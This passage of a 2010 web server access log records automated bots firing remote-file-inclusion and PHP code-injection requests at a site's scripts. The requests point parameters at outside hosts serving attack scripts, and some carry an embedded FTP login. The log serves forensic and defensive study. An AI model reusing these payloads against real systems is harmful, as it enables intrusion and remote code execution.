72.55.148.208 - - [05/Mar/2010:11:37:48 -0800] "GET /port.php?content=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:11:37:50 -0800] "GET /logs/access.log/port.php?content=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:11:37:50 -0800] "GET /logs/port.php?content=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.148.208 - - [05/Mar/2010:11:37:50 -0800] "GET /port.php?content=http://english.autoxjapan.com/modules/Forums/gf_funcs/id1auto.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.63.198.48 - - [05/Mar/2010:11:40:02 -0800] "GET /orange_g/forum/viewtopic.php?p=25373 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "puaga.com"
112.76.72.3 - - [05/Mar/2010:11:40:30 -0800] "GET /admin/auth.php?xcart_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:11:40:30 -0800] "GET /logs//admin/auth.php?xcart_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:11:40:30 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:11:40:57 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:41:24 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:41:24 -0800] "GET /logs/access_100223.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:41:24 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:11:41:52 -0800] "GET /admin/auth.php?xcart_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:11:41:52 -0800] "GET /logs//admin/auth.php?xcart_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:11:41:53 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:42:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:42:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [05/Mar/2010:11:42:12 -0800] "GET /logs/access_100223.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [05/Mar/2010:11:42:30 -0800] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:42:51 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:42:51 -0800] "GET /logs/access_100223.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:42:51 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:42:56 -0800] "GET /logs/access_100226.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:11:43:03 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:43:22 -0800] "GET /administrator/components/com_a6mambocredits.php?mosC?fig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:43:22 -0800] "GET /logs/administrator/components/com_a6mambocredits.php?mosC?fig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:43:22 -0800] "GET /logs/access_100210.log/administrator/components/com_a6mambocredits.php?mosC?fig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:43:23 -0800] "GET /administrator/components/com_a6mambocredits.php?mosC?fig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:43:23 -0800] "GET /logs/access_100210.log/administrator/components/com_a6mambocredits.php?mosC?fig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:43:23 -0800] "GET /logs/administrator/components/com_a6mambocredits.php?mosC?fig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:43:35 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:43:35 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:43:36 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:43:38 -0800] "GET /logs/access_100219.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:43:41 -0800] "GET /logs/access_100226.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:43:43 -0800] "GET /logs/access_100223.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:43:43 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.157.211.204 - - [05/Mar/2010:11:43:43 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kalasin-mu.go.th//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:43:46 -0800] "GET /logs/access_100219.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:11:44:20 -0800] "GET /logs/access_100207.log%20//admin/auth.php?xcart_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
69.175.39.122 - - [05/Mar/2010:11:44:22 -0800] "GET /logs/access_100219.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sumanenter.com/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:11:45:08 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:11:45:09 -0800] "GET /logs/access_100203.log%20%20////write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:11:45:09 -0800] "GET ///write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [05/Mar/2010:11:45:24 -0800] "GET /logs/access_100206.log%20%20////write_comment_update.php?board_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:11:45:26 -0800] "GET /logs/access_100207.log%20//admin/auth.php?xcart_dir=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:45:56 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:45:56 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:45:56 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:46:04 -0800] "GET /logs/access_100219.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [05/Mar/2010:11:47:01 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [05/Mar/2010:11:47:01 -0800] "GET /logs/access_100220.log%20%20///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [05/Mar/2010:11:47:01 -0800] "GET /logs///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [05/Mar/2010:11:48:57 -0800] "GET /logs/access_100205.log%20%20///administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:50:58 -0800] "GET /logs/administrator/components/com_a6mambocredits.php?mosConfig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:50:58 -0800] "GET /logs/access_100210.log/administrator/components/com_a6mambocredits.php?mosConfig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:50:58 -0800] "GET /administrator/components/com_a6mambocredits.php?mosConfig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:50:59 -0800] "GET /administrator/components/com_a6mambocredits.php?mosConfig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:50:59 -0800] "GET /logs/access_100210.log/administrator/components/com_a6mambocredits.php?mosConfig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:11:50:59 -0800] "GET /logs/administrator/components/com_a6mambocredits.php?mosConfig_live_site=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [05/Mar/2010:11:51:22 -0800] "GET /logs/access_100226.log/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.59.136.42 - - [05/Mar/2010:11:51:36 -0800] "GET /logs/access_100303.log/include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.120.104.120 - - [05/Mar/2010:11:51:40 -0800] "GET /logs/access_100211.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://antigua.granada.notariado.org//includes/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:54:30 -0800] "GET /logs/access_100222.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:54:30 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.24.9.88 - - [05/Mar/2010:11:54:31 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:11:57:54 -0800] "GET /module/setup.php//skin/moengallery/setup.php?dir=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 200 1720 "-" "Mozilla/5.0" "puaga.com"
62.140.23.24 - - [05/Mar/2010:11:58:20 -0800] "GET /module/setup.php//skin/moengallery/setup.php?dir=http://www.zahirajans.com/templates/plazza/1.txt? HTTP/1.1" 200 1720 "-" "Mozilla/5.0" "puaga.com"
211.63.219.132 - - [05/Mar/2010:12:00:48 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.63.219.132 - - [05/Mar/2010:12:00:48 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.63.219.132 - - [05/Mar/2010:12:00:48 -0800] "GET /logs/access_100213.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:12:01:04 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://solid.go.ro/idv6.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
211.63.219.132 - - [05/Mar/2010:12:01:04 -0800] "GET /logs/access_100201.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.201.180.130 - - [05/Mar/2010:12:01:09 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.201.180.130 - - [05/Mar/2010:12:01:13 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.201.180.130 - - [05/Mar/2010:12:01:14 -0800] "GET /logs/access_100224.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.252.242 - - [05/Mar/2010:12:07:34 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.pixero.net"
61.67.240.189 - - [05/Mar/2010:12:08:27 -0800] "GET /http://en.bysources.com/userfiles/gachen/x.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.828" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:12:08:28 -0800] "GET /logs/access_100211.log%20////index.php?mosconfig.absolute.path=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:12:08:28 -0800] "GET /logs////index.php?mosconfig.absolute.path=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
112.76.72.3 - - [05/Mar/2010:12:08:28 -0800] "GET ///index.php?mosconfig.absolute.path=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:12:08:40 -0800] "GET /logs/access_100211.log%20////index.php?mosconfig.absolute.path=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:12:08:40 -0800] "GET ///index.php?mosconfig.absolute.path=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.826" "www.puaga.com"
210.127.253.75 - - [05/Mar/2010:12:08:43 -0800] "GET /logs////index.php?mosconfig.absolute.path=ftp://frostin2:J7JjkzpfK@93.190.41.97/public_html/v6id.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
72.3.225.148 - - [05/Mar/2010:12:09:21 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
72.3.225.148 - - [05/Mar/2010:12:09:21 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.puaga.com"
72.14.178.125 - - [05/Mar/2010:12:10:00 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
72.14.178.125 - - [05/Mar/2010:12:10:00 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 200 3642 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:12:11:52 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:12:11:52 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:12:11:52 -0800] "GET /logs/access_100215.log%20%20/e404.php?DOCUMENT_ROOT=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.77.223.114 - - [05/Mar/2010:12:12:21 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
208.77.223.114 - - [05/Mar/2010:12:12:21 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
89.111.173.74 - - [05/Mar/2010:12:12:33 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.puaga.com"
89.111.173.74 - - [05/Mar/2010:12:12:36 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.puaga.com"
72.29.80.127 - - [05/Mar/2010:12:12:55 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.puaga.com"
72.29.80.127 - - [05/Mar/2010:12:12:56 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:12:13:18 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://solid.go.ro/idv6.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.38.243.44 - - [05/Mar/2010:12:13:19 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://solid.go.ro/idv6.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:12:13:24 -0800] "GET /logs/access_100214.log%20%20/e404.php?DOCUMENT_ROOT=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.86.156.123 - - [05/Mar/2010:12:14:08 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.puaga.com"
80.86.156.123 - - [05/Mar/2010:12:14:08 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.bedste-alice.dk/cache/a.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.puaga.com"
211.63.219.132 - - [05/Mar/2010:12:16:43 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.63.219.132 - - [05/Mar/2010:12:16:43 -0800] "GET /e404.php?DOCUMENT_ROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.63.219.132 - - [05/Mar/2010:12:16:43 -0800] "GET /logs/access_100215.log/e404.php?DOCUMENT_ROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.63.219.132 - - [05/Mar/2010:12:17:04 -0800] "GET /logs/access_100214.log/e404.php?DOCUMENT_ROOT=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.67.240.189 - - [05/Mar/2010:12:17:08 -0800] "GET /logs/access_100207.log/http://en.bysources.com/userfile